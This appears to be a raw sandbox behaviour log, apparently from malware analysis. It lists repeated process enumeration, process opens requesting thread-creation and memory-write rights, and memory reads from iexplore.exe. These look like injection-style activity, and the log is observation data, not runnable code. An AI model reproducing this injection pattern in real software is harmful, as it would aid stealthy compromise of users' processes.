Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147332096, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2822592, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2824600, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147344384, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 594368, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 596410, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
System	Sleep	duration = 100 milliseconds (0.100 seconds)	1	Fn
Process	Enumerate Processes	-	3	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147332096, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2822592, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2824600, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147344384, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 594368, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 596410, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
System	Sleep	duration = 100 milliseconds (0.100 seconds)	1	Fn
Process	Enumerate Processes	-	3	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
